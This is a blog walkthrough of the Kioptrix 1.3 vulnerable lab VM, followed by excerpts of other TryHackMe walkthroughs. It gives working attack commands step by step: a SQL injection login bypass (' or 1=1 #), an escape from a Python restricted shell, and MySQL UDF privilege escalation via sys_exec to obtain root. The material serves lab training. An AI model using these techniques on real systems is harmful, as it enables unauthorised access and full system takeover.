Kioptrix 1.3 (Level 4) Walkthrough

Introduction


Today we're going to do a boot2root pentest walkthrough of the Kioptrix 1.3 (Level 4) machine created by the Kioptrix team and hosted at https://www.vulnhub.com/entry/kioptrix-level-13-4,25/ .

For our pentest we'll be using two virtual machines, a Kali Linux machine as our attacking system, and the Kioptrix 1.3 machine as our target system.

Locating the Target

After booting up both of our machines, we need to locate the target system on our network. We do this by running netdiscover from our attacking system.

netdiscover -r 10.0.2.0/24


The target is at 10.0.2.25.

Scanning and Enumeration

Our scans start with nmap, determining open ports on the target system.

nmap -T4 -p- 10.0.2.25 ; nmap -T4 -sU -F 10.0.2.25


There are five ports open. We'll plug these open ports into nmap again and see if we can get more information.

nmap -T4 -A -p22,80,139,445 10.0.2.25


Not a lot of usable info here, but we'll continue scanning with dirb.

dirb http://10.0.2.25


The john directory is definitely interesting. We'll have to check it out when we enumerate the target's webpage, which we'll do now.

http://10.0.2.25


Standard stuff. Let's check out the john page.

http://10.0.2.25/john


Okay. Looks like our next destination is john.php.

http://10.0.2.25/john/john.php


Back to the login page. We have a hunch that john is a user on the system, so let's try some SQL injection with john as the username. We'll put in a standard SQL injection string in the password field.

Username = john
Password = ' or 1=1 #
Login


We're logged in, and we can see john's password, but there's nowhere to go from here. We'll try logging into the target system as john through SSH.

ssh john@10.0.2.25
MyNameIsJohn


Privilege Escalation

We're logged in as john, but it seems like we're stuck in a restricted shell, with only eight commands available to us. After doing a bit of research, these commands aren't going to let us break out, unless the restricted shell was created by Python, in which case we can break out using the following command with echo.

echo os.system("/bin/bash")


john doesn't have much privilege on the system, but there might be some clues in the webserver files, so we navigate there.

cd /var/www
ls
cat checklogin.php


This a good find. After a bit of research, we learn that there's a privilege escalation technique we can use if the target is running the MySQL service as root. How can we tell if this is true?

ps -elf | grep root


The article outlining the method for this exploit can be found here:

https://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html

Unfortunately, we will need to transfer a MySQL library file for the exploit to work, and all attempts to upload files to the system fail.

But, when checking the MySQL library, it turns out that the exact file that we need is already present on the system, which is a probably a big hint that it was placed there intentionally.

To run the exploit, we'll need to login to MySQL as the root user, then run a special SQL function that passes instructions to the system below.  We'll use the exploit to turn john into a admin user.

mysql -u root -p

create database adminjohn;
use adminjohn;
select sys_exec('usermod -a -G admin john');
exit
sudo su
MyNameIsJohn
whoami



We are now root.  The last thing we need to do is access the system's flag file.  This is usually located in the /root/ directory.

cd /root/
ls
cat congrats.txt


Summary

After initial scans, we found that the target system had an unusual web directory exposed which, combined with guessed credentials and SQL injection, led to discovery of valid credentials for SSH login to the system.  After bypassing a restricted shell imposed on the SSH user account, we were able to determine that the MySQL service was running as root, which led to exploitation via UDF (User Defined Functions) in the MySQL app, giving us control of the system and allowing us access to the system's flag file.

Finish














Comments

Post a Comment

Popular posts from this blog

TryHackMe - Windows PrivEsc - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Windows PrivEsc room hosted at https://tryhackme.com/room/w indows10privesc . For this walkthrough, we'll be using two virtual machines (VMs), a Kali Linux VM as our attacking machine, and the deployed Windows 10 client as the the victim machine. Task 1 - Deploy the Vulnerable Windows VM Press the green button here: The Windows machine should come online after a minute or two. The IP address of the machine can be found here: Of course, the actual IP address will probably be a different one from the one in the screenshot.  For the examples, however, we will use the IP address of 10.10.227.113 RDP should be available on port 3389 (it may take a few minutes for the service to start). You can login to the "user" account using the password "password321": xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.227.113 Questions: Deploy the Windows VM and login using the "user" ...
Read more

TryHackMe - Reversing Elf - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Reversing ELF room hosted at https://tryhackme.com/room/ reverselfiles . For this walkthrough, we'll be using one virtual machine (VMs), a Kali Linux VM as our attacking machine. Task 1 - Crackme1 Questions What is the flag? Download the Task 1 Task File Copy it to your working directory Give the file executable permissions Run the file chmod +x crackme1 ./crackme1 Task 2 - Crackme2 Questions What is the super secret password ? Give the file executable permissions Run Ltrace on the file with a test string chmod +x crackme2 ltrace ./crackme2 test ./crackme2 passwordFoundInPreviousStep Task 3 - Crackme3 Questions What is the flag? Give the file executable permissions Run strings on the file Echo the base64 string you found, pipe it into Base64 decode chmod +x crackme3 strings crackme3 echo “ base64stringFoundInPreviousStep ” | base64 -d Task 4 - Crackme4 Questions What is the password ? Give the file execu...
Read more

TryHackMe - Web Enumeration - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Web Enumeration room hosted at https://tryhackme.com/room/ webenumerationv2 . For this walkthrough, we'll be using two virtual machines (VMs), the TryHackMe AttackBox VM as our attacking machine, and the deployed vulnerable Web clients as the the victim machines. Task 1 - Introduction Questions: Let's get started No answer needed Task 2 - Manual Enumeration Questions I gotcha! No answer needed Task 3 - 1. introduction to Gobuster Questions No questions No answer needed Task 4 - 1.1 Gobuster Modes Questions I get the hang of it! No answer needed Task 5 - 1.2 Useful Wordlists Questions No questions No answer needed Task 6 - 1.3 Practical: Gobuster (Deploy #1) Questions Run a directory scan on the host. Other than the standard css, images and js directories, what other directories are available? echo “10.10.164.99 webenum.thm” >> /etc/hosts gobuster dir -t 16 -u http://webenum.thm -w /usr/sha...
Read more